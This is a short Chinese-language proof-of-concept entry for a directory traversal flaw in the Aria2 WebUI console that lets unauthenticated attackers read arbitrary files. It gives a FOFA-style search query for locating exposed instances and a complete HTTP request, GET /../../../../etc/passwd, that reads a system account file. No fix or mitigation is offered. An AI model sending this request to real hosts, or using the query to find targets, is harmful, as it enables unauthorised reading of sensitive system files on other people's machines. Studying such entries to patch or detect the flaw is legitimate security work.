Aria2 WebUI控制台存在任意文件读取
一、漏洞简介
Aria2 WebUI控制台存在目录遍历漏洞,未授权的攻击者可通过../目录遍历读取任意系统文件,导致系统敏感信息泄露,使系统处于极不安全的状态。
二、影响版本
- Aria2 WebUI
三、资产测绘
app="Aria2-WebUI"
四、漏洞复现
GET /../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close